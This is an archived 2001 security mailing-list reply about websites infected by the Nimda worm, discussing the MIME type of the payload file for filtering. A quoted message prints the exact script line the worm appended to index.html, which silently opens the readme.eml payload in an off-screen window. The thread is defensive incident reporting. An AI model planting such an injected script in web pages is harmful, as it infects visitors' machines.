RE: Web site infected by Nimda

From: John Q. Public (tpublicat_private)
Date: Wed Sep 19 2001 - 10:25:24 PDT

Next message: Tony Mason: "RE: New worm attacking MS DNS servers?"

Previous message: Ken Pfeil: "RE: Web site infected by Nimda"
In reply to: Jac Engel: "RE: Web site infected by Nimda"
Next in thread: Rob Quinn: "Re: MIME type of readme.eml (was Re: Web site infected by Nimda"
Reply: Rob Quinn: "Re: MIME type of readme.eml (was Re: Web site infected by Nimda"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Interestingly, the content type from www.wininternals.com (aka 207.30.43.69,
aka underconstruction.infoback.net) is application/octet-stream.  The content
type on www.digimind.fr is correct at "message/rfc822."

Something to keep in mind if you're setting up filters.

.nhoJ

On Wed, 19 Sep 2001, Jac Engel wrote:

|Date: Wed, 19 Sep 2001 19:07:22 +0200
|From: Jac Engel <jacengelat_private>
|To: "acz [iSecureLabs]" <aurelien.cabezonat_private>,
     incidentsat_private
|Subject: RE: Web site infected by Nimda
|
|http://www.wininternals.com is also infected by Nimda Virus,
|after the page is loaded  I get a new page
|saying :
|You have encountered the following error while using Windows Media Player:
|----------------------------------------------------------------------------
|----
|Error#  8007000D
|Sorry, no more help is available for this problem at this time.
|
|Jac
|
|-----Original Message-----
|From: acz [iSecureLabs] [mailto:aurelien.cabezonat_private]
|Sent: Sunday, September 19, 1999 5:46 PM
|To: incidentsat_private
|Subject: Web site infected by Nimda
|
|
|Hi all,
|
|http://www.digimind.fr/ is infected by Nimda virus !
|
|This line was added at the end of the index.html
|
|---<cut>---
|<html><script language="JavaScript">window.open("readme.eml", null,
|"resizable=no,top=6000,left=6000")</script></html>
|---<cut>---
|
|If you wanna visit digimind.fr, turn your webbrowser javascript off !
|
|---
|Cabezon Aurelien
|http://www.iSecureLabs.com
|
|
|----------------------------------------------------------------------------
|This list is provided by the SecurityFocus ARIS analyzer service.
|For more information on this free incident handling, management
|and tracking system please see: http://aris.securityfocus.com
|
|
|----------------------------------------------------------------------------
|This list is provided by the SecurityFocus ARIS analyzer service.
|For more information on this free incident handling, management 
|and tracking system please see: http://aris.securityfocus.com
|


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Tony Mason: "RE: New worm attacking MS DNS servers?"
Previous message: Ken Pfeil: "RE: Web site infected by Nimda"
In reply to: Jac Engel: "RE: Web site infected by Nimda"
Next in thread: Rob Quinn: "Re: MIME type of readme.eml (was Re: Web site infected by Nimda"
Reply: Rob Quinn: "Re: MIME type of readme.eml (was Re: Web site infected by Nimda"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 10:55:41 PDT